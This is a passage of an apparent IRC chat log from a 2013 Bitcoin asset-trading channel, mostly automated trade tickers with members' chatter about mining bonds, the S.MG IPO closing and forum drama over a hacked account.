100th second most wanted... I feel a bit responsibel for that. Jun 10 21:01:31 Yeah, I saw that and posted on Reddit too. It's not as serioius as it may look, though. Jun 10 21:01:41 DAMN my spelling. Jun 10 21:02:24 It's only a single account that was hacked, and by hacked I mean someone guessed or found a password. The site itself is still safe based on what they have said. Jun 10 21:03:45 [BTCTC] [ASICMINER-PT] 1 @ 2.476401 BTC [-] Jun 10 21:04:00 damnit, the wwdc stream is dying on me Jun 10 21:06:21 [BTCTC] [BTC-TRADING-PT] 1 @ 0.290101 BTC [-] Jun 10 21:06:25 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2901 BTC [-] Jun 10 21:06:29 [BTCTC] [BTC-TRADING-PT] 7 @ 0.29 = 2.03 BTC [-] Jun 10 21:07:17 [HAVELOCK] [ASICM] 47 @ 0.024521 = 1.1525 BTC [-] Jun 10 21:07:27 lmaoooo http://www.gizoogle.net/tranzizzle.php?search=https%3A%2F%2Fbitcointalk.org%2Findex.php%3Ftopic%3D174620.0%3Ball&se=Go+Git+Dis+Shiznit Jun 10 21:07:43 reptilia diary + gangsta translator Jun 10 21:08:04 "phat readin experience" Jun 10 21:09:34 [BTCTC] [ASICMINER-PT] 1 @ 2.479999 BTC [+] Jun 10 21:09:41 hahahahaha Roni woke me up at 4:30, he is hustlin fo' me as a funky-ass bitcoin broker n' shiznit yo. Jun 10 21:09:55 [HAVELOCK] [ASICM] 43 @ 0.024521 = 1.0544 BTC [-] Jun 10 21:10:48 when did reptilia get hood Jun 10 21:11:05 I missed this part, is it after his mental breakdown or before Jun 10 21:11:21 Haha, loved the gangsta article :-) Jun 10 21:11:25 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 10 21:11:39 oh , lol i see Jun 10 21:13:03 I'm contemplating building a page that shows what the 'best' PMBs are (rated by price/hash only). Right now, I'm fairly certain 100TH is way up there, followed by upgraded PAJKA and TAT.VM. Jun 10 21:13:49 yes, do it. as long as nobody offers to pay for it Jun 10 21:14:03 [BTCTC] [BASIC-MINING] 1 @ 0.651001 BTC [-] Jun 10 21:14:12 [HAVELOCK] [ASICM] 6 @ 0.02489979 = 0.1494 BTC [+] Jun 10 21:14:40 Nobody should pay for it; it would be based on HTML and JSON only so source would be fully visible. Jun 10 21:15:28 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.008 = 0.4 BTC [+] Jun 10 21:15:29 I'm thinking that the asset issuers won't be very happy since it turns their bonds into a mere numbers game. Also the exchanges may not be that keen because it will put load on their servers directly (for transparency). Jun 10 21:16:05 Of course, PMBs are always a numbers game, so it will just be exposing the numbers more easily. Jun 10 21:16:52 sry, just trolling a bit. will be good to see which ones will have problem with it. Jun 10 21:18:19 Sure, I got that. It can turn both ways, though. It will certainly bring more 'fairness' to PMBs but it can also kill a lot of assets and make some investors extremely angry. Jun 10 21:19:42 Unlike a lot of people, I don't have a problem with PMBs. Sure, in difficulty rises it loses value, but so does owning mining equipment and you don't see people run arond screming "MINING IS A SCAM!" for that reason. Jun 10 21:29:00 [BTCTC] [DMS.SELLING] 1 @ 0.051 BTC Jun 10 21:31:03 DMS is up, apparently. Jun 10 21:31:15 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00799 = 0.3995 BTC [-] Jun 10 21:31:23 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 10 21:32:20 [MPEX] [S.MPOE] 6132 @ 0.00072846 = 4.4669 BTC [+] Jun 10 21:32:22 [MPEX] [S.MPOE] 5968 @ 0.00072849 = 4.3476 BTC [+] Jun 10 21:32:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.024797 BTC [+] Jun 10 21:34:26 ;;seen mircea_popescu Jun 10 21:34:26 mircea_popescu was last seen in #bitcoin-assets 2 hours, 53 minutes, and 51 seconds ago: people have solutions. Jun 10 21:34:44 !ticker S.MG Jun 10 21:34:44 These beans is shit. Jun 10 21:34:48 !ticker m S.MG Jun 10 21:34:48 [MPEX:S.MG] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC) Jun 10 21:34:53 !ticker m ^OIX Jun 10 21:34:54 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 72.38373861 / 149.20166805 / 158.74137702 (95 shares, 28.61 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jun 10 21:40:36 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 10 21:42:27 [BTCTC] [TAT.ASICMINER] 8 @ 0.024796 = 0.1984 BTC [-] Jun 10 21:43:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.024797 = 0.0496 BTC [+] Jun 10 21:44:22 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 10 21:44:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.024872 = 0.0497 BTC [+] Jun 10 21:46:22 [HAVELOCK] [ASICM] 6 @ 0.02451201 = 0.1471 BTC [-] Jun 10 21:46:46 [HAVELOCK] [ASICM] 90 @ 0.024512 = 2.2061 BTC [-] Jun 10 21:49:11 !ticker btct tat.virtualmine Jun 10 21:49:20 [BTCT:TAT.VIRTUALMINE] 1D: 0.007 / 0.00702 / 0.008 (21458 shares, 150.7 BTC), 7D: 0.007 / 0.00702 / 0.008 (21458 shares, 150.7 BTC), 30D: 0.007 / 0.00702 / 0.008 (21458 shares, 150.7 BTC) Jun 10 21:52:26 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 10 22:00:47 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17011 BTC [-] Jun 10 22:00:49 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1701 = 0.3402 BTC [-] Jun 10 22:00:50 [BTCTC] [CRYPTO-TRADE] 36 @ 0.170051 = 6.1218 BTC [-] Jun 10 22:00:52 [BTCTC] [CRYPTO-TRADE] 10 @ 0.17005 = 1.7005 BTC [-] Jun 10 22:01:00 [BTCTC] [CRYPTO-TRADE] 4 @ 0.17 = 0.68 BTC [-] Jun 10 22:02:02 [BTCTC] [PAJKA.BOND] 5 @ 0.075 = 0.375 BTC [-] Jun 10 22:07:20 [BTCTC] [TAT.ASICMINER] 49 @ 0.024873 = 1.2188 BTC [+] Jun 10 22:08:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.024874 = 0.0995 BTC [+] Jun 10 22:08:50 [BTCTC] [TAT.ASICMINER] 41 @ 0.024874 = 1.0198 BTC [+] Jun 10 22:11:31 [HAVELOCK] [HIM] 2 @ 0.2705 = 0.541 BTC [-] Jun 10 22:11:54 [HAVELOCK] [ASICM] 10 @ 0.024512 = 0.2451 BTC [-] Jun 10 22:11:55 [HAVELOCK] [ASICM] 501 @ 0.02451 = 12.2795 BTC [-] Jun 10 22:11:56 [HAVELOCK] [ASICM] 50 @ 0.02450001 = 1.225 BTC [-] Jun 10 22:11:57 [HAVELOCK] [ASICM] 20 @ 0.0245 = 0.49 BTC [-] Jun 10 22:11:58 [HAVELOCK] [ASICM] 419 @ 0.0245 = 10.2655 BTC [-] Jun 10 22:13:57 [HAVELOCK] [VTX] 5 @ 0.4441 = 2.2205 BTC [-] Jun 10 22:14:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.024874 = 0.0497 BTC [+] Jun 10 22:14:40 [BTCTC] [S.DICE-PT] 5 @ 0.00279 = 0.014 BTC [-] Jun 10 22:16:43 [BTCTC] [S.DICE-PT] 35 @ 0.0028 = 0.098 BTC [+] Jun 10 22:22:35 [HAVELOCK] [HIM] 8 @ 0.2705 = 2.164 BTC [-] Jun 10 22:31:57 [HAVELOCK] [ASICM] 6 @ 0.02489979 = 0.1494 BTC [+] Jun 10 22:33:21 can you only purchase S.MG with an mpex account? Jun 10 22:34:16 i think you can do it on coinbr no Jun 10 22:36:30 yep - thanks Jun 10 22:36:40 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jun 10 22:38:36 yes it's on coinbr Jun 10 22:39:44 [HAVELOCK] [ASICM] 5 @ 0.0248998 = 0.1245 BTC [+] Jun 10 22:40:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.024874 BTC [+] Jun 10 22:44:39 [HAVELOCK] [ASICM] 2 @ 0.0248998 = 0.0498 BTC [+] Jun 10 22:44:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.024874 = 0.199 BTC [+] Jun 10 22:45:01 jurov: so when you buy, are you buying from the ipo? or has it started trading? Jun 10 22:45:37 coinbr places orders on mpex immediately, so.. lemme see. Jun 10 22:45:44 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00799 = 0.3995 BTC [-] Jun 10 22:46:10 http://mpex.co/?mpsic=S.MG&r=1 looks like the IPO wasn't finished yet. Jun 10 22:46:46 [BTCTC] [PAJKA.BOND] 3 @ 0.079 = 0.237 BTC [+] Jun 10 22:46:58 or in mopex vernacular "consummated" :D Jun 10 22:48:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.024874 = 0.0497 BTC [+] Jun 10 22:49:37 So in 4 hours (June 11) the deed will be done? - to use the vernacular Jun 10 22:49:47 Most likely. Jun 10 22:50:00 cool - thanks Jun 10 22:55:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.024874 = 0.0995 BTC [+] Jun 10 22:55:18 [BTCTC] [TAT.ASICMINER] 29 @ 0.024875 = 0.7214 BTC [+] Jun 10 22:55:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.024876 = 0.1741 BTC [+] Jun 10 22:58:25 [BTCTC] [B.YABMC] 15 @ 0.012023 = 0.1803 BTC [-] Jun 10 23:03:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00799 BTC [-] Jun 10 23:04:28 [MPEX] [S.MPOE] 8100 @ 0.00072814 = 5.8979 BTC [-] Jun 10 23:04:47 [BTCTC] [TAT.VIRTUALMINE] <<< ThickAsThieves: y u no arb? Jun 10 23:11:03 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 10 23:11:14 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 10 23:16:07 [BTCTC] [DMS.MINING] 10 @ 0.0231 = 0.231 BTC Jun 10 23:37:23 [HAVELOCK] [ASICM] 40 @ 0.0248998 = 0.996 BTC [+] Jun 10 23:37:24 [HAVELOCK] [ASICM] 200 @ 0.02494999 = 4.99 BTC [+] Jun 10 23:37:26 [HAVELOCK] [ASICM] 31 @ 0.02495 = 0.7735 BTC [+] Jun 10 23:37:27 [HAVELOCK] [ASICM] 120 @ 0.02495 = 2.994 BTC [+] Jun 10 23:38:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02465 BTC [-] Jun 10 23:38:47 [BTCTC] [PAJKA.BOND] 2 @ 0.075 = 0.15 BTC [-] Jun 10 23:38:49 [HAVELOCK] [ASICM] 100 @ 0.02499999 = 2.5 BTC [+] Jun 10 23:40:24 [HAVELOCK] [ASICM] 256 @ 0.02499999 = 6.4 BTC [+] Jun 10 23:42:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1701 BTC [+] Jun 10 23:43:28 [BTCTC] [TAT.VIRTUALMINE] 26 @ 0.00777 = 0.202 BTC [-] Jun 10 23:43:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.17 BTC [-] Jun 10 23:45:10 [HAVELOCK] [HIM] 1 @ 0.2948 BTC [+] Jun 10 23:52:07 [MPEX] [S.MPOE] 4350 @ 0.00072814 = 3.1674 BTC [-] Jun 10 23:52:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.024876 = 0.2488 BTC [+] Jun 10 23:52:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.024876 BTC [+] Jun 10 23:54:51 [BTCTC] [COGNITIVE] 1 @ 0.299999 BTC [-] Jun 10 23:55:06 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Jun 10 23:55:15 [BTCTC] [COGNITIVE] 1 @ 0.301 BTC [+] Jun 10 23:55:23 [BTCTC] [COGNITIVE] 1 @ 0.302 BTC [+] Jun 10 23:55:32 [BTCTC] [COGNITIVE] 1 @ 0.303 BTC [+] Jun 10 23:55:43 [BTCTC] [COGNITIVE] 1 @ 0.305 BTC [+] Jun 10 23:55:52 [BTCTC] [DMS.MINING] 10 @ 0.0279 = 0.279 BTC [+] Jun 10 23:55:54 [BTCTC] [DMS.MINING] 25 @ 0.028 = 0.7 BTC [+] Jun 10 23:55:56 [BTCTC] [DMS.MINING] 15 @ 0.029 = 0.435 BTC [+] Jun 10 23:55:56 [BTCTC] [DMS.MINING] 25 @ 0.03 = 0.75 BTC [+] Jun 10 23:55:58 [BTCTC] [COGNITIVE] 1 @ 0.308996 BTC [+] Jun 10 23:56:21 [BTCTC] [BASIC-MINING] 1 @ 0.699999 BTC [+] Jun 10 23:59:50 [BTCTC] [DMS.MINING] 50 @ 0.02999 = 1.4995 BTC [-] Jun 10 23:59:52 [BTCTC] [DMS.MINING] 25 @ 0.0301 = 0.7525 BTC [+] Jun 10 23:59:53 [BTCTC] [DMS.MINING] 25 @ 0.0315 = 0.7875 BTC [+] Jun 10 23:59:54 [BTCTC] [DMS.MINING] 25 @ 0.0315 = 0.7875 BTC [+] Jun 10 23:59:55 [BTCTC] [DMS.MINING] 3 @ 0.0317 = 0.0951 BTC [+] Jun 10 23:59:56 [BTCTC] [DMS.MINING] 25 @ 0.032 = 0.8 BTC [+] Jun 10 23:59:57 [BTCTC] [DMS.MINING] 25 @ 0.033 = 0.825 BTC [+] Jun 10 23:59:58 [BTCTC] [DMS.MINING] 25 @ 0.033 = 0.825 BTC [+] Jun 11 00:00:02 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 11 00:01:20 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 11 00:01:51 [HAVELOCK] [HIM] 6 @ 0.2899 = 1.7394 BTC [-] Jun 11 00:02:04 [BTCTC] [DMS.PURCHASE] 1000 @ 0.065258 = 65.258 BTC Jun 11 00:08:12 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 00:16:15 [BTCTC] [BITVPS] 307 @ 0.0007 = 0.2149 BTC [-] Jun 11 00:17:58 [BTCTC] [TAT.ASICMINER] 25 @ 0.024877 = 0.6219 BTC [+] Jun 11 00:21:49 Chaaaang-Noi!*@* added to ignore list. Jun 11 00:21:53 [BTCTC] [TAT.ASICMINER] 20 @ 0.024877 = 0.4975 BTC [+] Jun 11 00:23:05 unloading shares of a company that went belly up 2 days later << was more like 3 weeks iirc Jun 11 00:24:24 oh my bad Jun 11 00:25:58 2 das Jun 11 00:26:05 days* would have been really lol Jun 11 00:26:06 do you remember what day GLBSE lew up/shut down? Jun 11 00:26:12 anyway, the guy claimed he had no foreknowledge. Jun 11 00:26:28 jborkl yes, because mpex fee went to 30 that same day. Jun 11 00:26:39 cause Theymos was selling on sept 26th Jun 11 00:26:50 was iirc early/mid oct Jun 11 00:26:52 maybe 6th Jun 11 00:27:04 so puls or minus 10 days Jun 11 00:27:07 plus Jun 11 00:27:29 ;;google scammer tag theymoos others known and unknown Jun 11 00:27:30 No matches found. Jun 11 00:27:33 hm Jun 11 00:27:52 https://bitcointalk.org/index.php?topic=117235.0 Jun 11 00:27:53 there. Jun 11 00:29:55 Lol, people were so angry with mpoe-pr Jun 11 00:32:13 [HAVELOCK] [ASICM] 74 @ 0.0248 = 1.8352 BTC [-] Jun 11 00:32:14 [HAVELOCK] [ASICM] 6 @ 0.02452005 = 0.1471 BTC [-] Jun 11 00:32:15 [HAVELOCK] [ASICM] 121 @ 0.02452002 = 2.9669 BTC [-] Jun 11 00:32:17 [HAVELOCK] [ASICM] 47 @ 0.024511 = 1.152 BTC [-] Jun 11 00:32:18 [HAVELOCK] [ASICM] 203 @ 0.0245011 = 4.9737 BTC [-] Jun 11 00:32:19 [HAVELOCK] [ASICM] 3 @ 0.0245001 = 0.0735 BTC [-] Jun 11 00:32:20 [HAVELOCK] [ASICM] 1 @ 0.0245001 BTC [-] Jun 11 00:32:20 [HAVELOCK] [ASICM] 53 @ 0.02450002 = 1.2985 BTC [-] Jun 11 00:32:21 [HAVELOCK] [ASICM] 21 @ 0.02450001 = 0.5145 BTC [-] Jun 11 00:32:22 [HAVELOCK] [ASICM] 169 @ 0.02450001 = 4.1405 BTC [-] Jun 11 00:33:22 myea Jun 11 00:33:41 as per usual. Jun 11 00:34:00 [BTCTC] [PAJKA.BOND] 1 @ 0.0753 BTC [+] Jun 11 00:34:02 [BTCTC] [PAJKA.BOND] 3 @ 0.075 = 0.225 BTC [-] Jun 11 00:34:03 [BTCTC] [PAJKA.BOND] 11 @ 0.0745 = 0.8195 BTC [-] Jun 11 00:34:16 people were angry with her when she broke the pirate bs too, and right now https://bitcointalk.org/index.php?topic=230072.msg2430548#msg2430548 Jun 11 00:34:42 [BTCTC] [ASICMINER-PT] 1 @ 2.477001 BTC [-] Jun 11 00:34:44 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [-] Jun 11 00:34:45 [BTCTC] [ASICMINER-PT] 1 @ 2.4764 BTC [-] Jun 11 00:34:47 [BTCTC] [ASICMINER-PT] 2 @ 2.4762 = 4.9524 BTC [-] Jun 11 00:34:50 [BTCTC] [ASICMINER-PT] 7 @ 2.476 = 17.332 BTC [-] Jun 11 00:34:53 [BTCTC] [ASICMINER-PT] 9 @ 2.474 = 22.266 BTC [-] Jun 11 00:34:56 [BTCTC] [ASICMINER-PT] 2 @ 2.472011 = 4.944 BTC [-] Jun 11 00:34:58 [BTCTC] [ASICMINER-PT] 1 @ 2.471001 BTC [-] Jun 11 00:35:03 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 11 00:37:15 http://philanthropy.com/article/Can-Nonprofits-Benefit-From/139625/ Jun 11 00:37:41 I'm back from a few days in Asheville, NC, did I miss anything fun? Jun 11 00:38:16 your IPO on btct.co :) Jun 11 00:38:22 welcome back Jun 11 00:41:35 [HAVELOCK] [ASICM] 1 @ 0.0249999 BTC [+] Jun 11 00:43:58 https://bitcointalk.org/index.php?topic=228812.msg2434086#msg2434086 Jun 11 00:44:02 this, lol. Jun 11 00:44:05 hehe, i did manage to do a lil trading via tablet Jun 11 00:44:18 da fuck does the guy imagine offices are, space stations on mars ? Jun 11 00:44:23 oh i was just looking at that Jun 11 00:45:02 i don't uderstand how moderators aren't moderating this at all Jun 11 00:45:16 this destroyer dude should be banned no? Jun 11 00:45:26 extortion, abuse of the systen, etc Jun 11 00:46:22 so you ban him Jun 11 00:46:26 he remakes acct. Jun 11 00:48:10 maybe so, but the thread surely is erasable Jun 11 00:48:51 surely some sort of action could help Jun 11 00:49:26 ah, actually Jun 11 00:49:40 they did delete his trust feedback from my profile Jun 11 00:49:48 so they are doing some bit of editing Jun 11 00:49:50 well... i don't know. Jun 11 00:50:02 afaik he had like -10 trust. Jun 11 00:50:46 [BTCTC] [DMS.PURCHASE] 17 @ 0.065258 = 1.1094 BTC Jun 11 00:50:50 Bitcointalk, embodied in one user Jun 11 00:50:53 oh shit, Jun 11 00:51:00 did you see destroyer's sig? Jun 11 00:51:04 "Update: Hi everyone, just to let you guys know that I hacked this account and removed all the negative trust, I've dealt with that scumbag hacker-wannabe extortionist I rooted his fucking machine and stole every last bitcent. I will be in contact with those that he has defrauded and you will be reimbursed fully BM-2D8oHJRsGqH82FDAC2eTEtVmeN7TAVmNBP the1 trojan" Jun 11 00:51:56 moar drama, always good. Jun 11 00:52:14 nice Jun 11 00:52:22 many lulz Jun 11 00:54:46 [MPEX] [S.MPOE] 2778 @ 0.00072814 = 2.0228 BTC [-] Jun 11 00:55:35 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [+] Jun 11 01:00:10 lol didn't see that coming Jun 11 01:01:51 how do you know? Jun 11 01:02:46 ;;ticker Jun 11 01:02:54 BTCUSD ticker | Best bid: 106.25505, Best ask: 106.97998, Bid-ask spread: 0.72493, Last trade: 106.84000, 24 hour volume: 71871.33480559, 24 hour low: 95.00000, 24 hour high: 110.63051, 24 hour vwap: 105.04932 Jun 11 01:03:54 ;;next Jun 11 01:03:55 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 17 hours, 48 minutes, and 44 seconds ago Jun 11 01:05:40 http://zeptobars.ru/en/read/avalon-bitcoin-mining-unit-rig?utm_source=feedly Jun 11 01:07:55 wow. Jun 11 01:22:12 [BTCTC] [ASICMINER-PT] 1 @ 2.465001 BTC [-] Jun 11 01:22:44 [BTCTC] [DMS.MINING] 1 @ 0.032699 BTC [-] Jun 11 01:23:08 [BTCTC] [TAT.VIRTUALMINE] 74 @ 0.00777 = 0.575 BTC [-] Jun 11 01:23:19 [BTCTC] [DMS.MINING] 5 @ 0.032699 = 0.1635 BTC [-] Jun 11 01:24:02 [BTCTC] [DMS.MINING] 11 @ 0.032699 = 0.3597 BTC [-] Jun 11 01:24:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.024876 BTC [-] Jun 11 01:24:21 [BTCTC] [DMS.MINING] 10 @ 0.0327 = 0.327 BTC [+] Jun 11 01:24:28 [BTCTC] [DMS.MINING] 100 @ 0.0328 = 3.28 BTC [+] Jun 11 01:24:30 [BTCTC] [DMS.MINING] 50 @ 0.032857 = 1.6429 BTC [+] Jun 11 01:24:31 [BTCTC] [DMS.MINING] 50 @ 0.033 = 1.65 BTC [+] Jun 11 01:27:43 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 01:27:54 [BTCTC] [DMS.MINING] 18 @ 0.03335 = 0.6003 BTC [+] Jun 11 01:32:15 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 01:35:00 bitbet.us/bet/464/china-gold-reserves-in-excess-of-4000-tonnes/ Jun 11 01:35:08 [MPEX] [S.MPOE] 12722 @ 0.0007266 = 9.2438 BTC [-] Jun 11 01:35:13 [MPEX] [S.MPOE] 1582 @ 0.00072849 = 1.1525 BTC [+] Jun 11 01:35:14 [MPEX] [S.MPOE] 696 @ 0.0007303 = 0.5083 BTC [+] Jun 11 01:35:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.0249 = 0.0498 BTC [+] Jun 11 01:38:10 [BTCTC] [ASICMINER-PT] 1 @ 2.469999 BTC [+] Jun 11 01:39:51 [BTCTC] [PAJKA.BOND] 2 @ 0.0745 = 0.149 BTC [-] Jun 11 01:41:58 [BTCTC] [DMS.PURCHASE] 22 @ 0.065258 = 1.4357 BTC Jun 11 01:45:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.02465 = 0.2465 BTC [-] Jun 11 01:45:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.02463 = 0.2956 BTC [-] Jun 11 01:45:12 [BTCTC] [TAT.ASICMINER] 31 @ 0.024626 = 0.7634 BTC [-] Jun 11 01:45:18 mircea_popescu: do you fulfill the buy orders for S.MG? Jun 11 01:45:38 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] Jun 11 01:45:39 what are you asking ? Jun 11 01:46:10 he's asking if you will be selling more S.MG into the bids again, i think Jun 11 01:46:28 yes - i thought the ipo was still open? Jun 11 01:48:19 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] Jun 11 01:48:41 yes, closing soon. Jun 11 01:49:19 so all these orders http://mpex.co/?mpsic=S.MG will be filled? Jun 11 01:49:30 possibly. Jun 11 01:49:36 got it Jun 11 01:49:38 !t m s.mg Jun 11 01:49:39 [MPEX:S.MG] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC) Jun 11 01:49:51 ;;calc 1 - .82086555 Jun 11 01:49:52 0.17913445 Jun 11 01:50:02 that many shares left. Jun 11 01:50:31 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 11 01:53:28 [BTCTC] [DMS.PURCHASE] 8 @ 0.065258 = 0.5221 BTC Jun 11 01:58:14 [BTCTC] [TAT.ASICMINER] 18 @ 0.0249 = 0.4482 BTC [+] Jun 11 01:59:07 [HAVELOCK] [VTX] 5 @ 0.4739 = 2.3695 BTC [+] Jun 11 01:59:23 [BTCTC] [DMS.MINING] 1 @ 0.033 BTC [-] Jun 11 02:01:08 [HAVELOCK] [VTX] 1 @ 0.474 BTC [+] Jun 11 02:01:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.024983 BTC [+] Jun 11 02:02:00 [HAVELOCK] [VTX] 1 @ 0.479 BTC [+] Jun 11 02:07:04 "So, I start mining only to realise that there's a minimum withdrawal of 0.05 BTC which took me about a week to mine." Jun 11 02:09:28 mining is a scam Jun 11 02:11:51 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 11 02:13:06 https://bitcointalk.org/index.php?topic=133147.msg2432036#msg2432036 Jun 11 02:13:08 le lols. Jun 11 02:13:33 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.00751 = 0.2103 BTC [-] Jun 11 02:13:35 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.0075 = 0.165 BTC [-] Jun 11 02:17:24 [BTCTC] [PAJKA.BOND] 1 @ 0.0815 BTC [+] Jun 11 02:19:41 [BTCTC] [PAJKA.BOND] 1 @ 0.084 BTC [+] Jun 11 02:20:23 [BTCTC] [PAJKA.BOND] 5 @ 0.085 = 0.425 BTC [+] Jun 11 02:21:07 [BTCTC] [PAJKA.BOND] 3 @ 0.0887 = 0.2661 BTC [+] Jun 11 02:21:32 [BTCTC] [DMS.PURCHASE] 164 @ 0.065258 = 10.7023 BTC Jun 11 02:21:42 [BTCTC] [PAJKA.BOND] 2 @ 0.0888 = 0.1776 BTC [+] Jun 11 02:23:21 [BTCTC] [ASICMINER-PT] 1 @ 2.465001 BTC [-] Jun 11 02:23:28 [BTCTC] [PAJKA.BOND] 17 @ 0.089999 = 1.53 BTC [+] Jun 11 02:25:10 [BTCTC] [S.MPOE-PT] 18 @ 0.000685 = 0.0123 BTC [-] Jun 11 02:25:13 [BTCTC] [S.MPOE-PT] 100 @ 0.000685 = 0.0685 BTC [-] Jun 11 02:25:58 [BTCTC] [S.MPOE-PT] 765 @ 0.000684 = 0.5233 BTC [-] Jun 11 02:25:59 [BTCTC] [S.MPOE-PT] 30 @ 0.000684 = 0.0205 BTC [-] Jun 11 02:27:48 [BTCTC] [S.DICE-PT] 16 @ 0.002601 = 0.0416 BTC [-] Jun 11 02:27:51 [BTCTC] [S.DICE-PT] 10 @ 0.0026 = 0.026 BTC [-] Jun 11 02:27:53 [BTCTC] [S.DICE-PT] 10 @ 0.00251 = 0.0251 BTC [-] Jun 11 02:27:59 [BTCTC] [S.DICE-PT] 60 @ 0.002501 = 0.1501 BTC [-] Jun 11 02:28:02 [BTCTC] [S.DICE-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 11 02:28:15 [BTCTC] [S.DICE-PT] 30 @ 0.0025 = 0.075 BTC [-] Jun 11 02:28:28 [BTCTC] [S.DICE-PT] 4 @ 0.0025 = 0.01 BTC [-] Jun 11 02:29:24 [BTCTC] [S.BBET-PT] 1 @ 0.00164 BTC [-] Jun 11 02:29:25 [BTCTC] [S.BBET-PT] 16 @ 0.00163 = 0.0261 BTC [-] Jun 11 02:30:17 [BTCTC] [S.MPOE-PT] 14 @ 0.000684 = 0.0096 BTC [-] Jun 11 02:30:33 [MPEX] [S.MG] 200000 @ 0.00010011 = 20.022 BTC [+] Jun 11 02:30:39 [MPEX] [S.MG] 100000 @ 0.00010001 = 10.001 BTC [-] Jun 11 02:30:40 [MPEX] [S.MG] 100000 @ 0.00010001 = 10.001 BTC [-] Jun 11 02:30:49 and that's it, IPO complete. will make a post soon. Jun 11 02:30:52 [MPEX] [S.MG] 100000 @ 0.0001 = 10 BTC [-] Jun 11 02:30:54 [MPEX] [S.MG] 100000 @ 0.0001 = 10 BTC [-] Jun 11 02:30:55 [MPEX] [S.MG] 75000 @ 0.0001 = 7.5 BTC [-] Jun 11 02:30:57 [MPEX] [S.MG] 50 @ 0.0001 = 0.005 BTC [-] Jun 11 02:31:01 [MPEX] [S.MG] 45000 @ 0.0001 = 4.5 BTC [-] Jun 11 02:31:03 [MPEX] [S.MG] 290000 @ 0.0001 = 29 BTC [-] Jun 11 02:31:08 [MPEX] [S.MG] 5000000 @ 0.0001 = 500 BTC [-] Jun 11 02:31:30 [BTCTC] [CRYPTO-TRADE] 3 @ 0.165002 = 0.495 BTC [-] Jun 11 02:31:32 [BTCTC] [CRYPTO-TRADE] 2 @ 0.165 = 0.33 BTC [-] Jun 11 02:31:56 [BTCTC] [S.MPOE-PT] 68 @ 0.000684 = 0.0465 BTC [-] Jun 11 02:32:43 [BTCTC] [BITVPS] 2 @ 0.000653 = 0.0013 BTC [-] Jun 11 02:34:08 [BTCTC] [S.DICE-PT] 75 @ 0.00241 = 0.1808 BTC [-] Jun 11 02:34:10 [BTCTC] [S.DICE-PT] 100 @ 0.002409 = 0.2409 BTC [-] Jun 11 02:34:14 [BTCTC] [S.DICE-PT] 100 @ 0.002408 = 0.2408 BTC [-] Jun 11 02:34:51 [HAVELOCK] 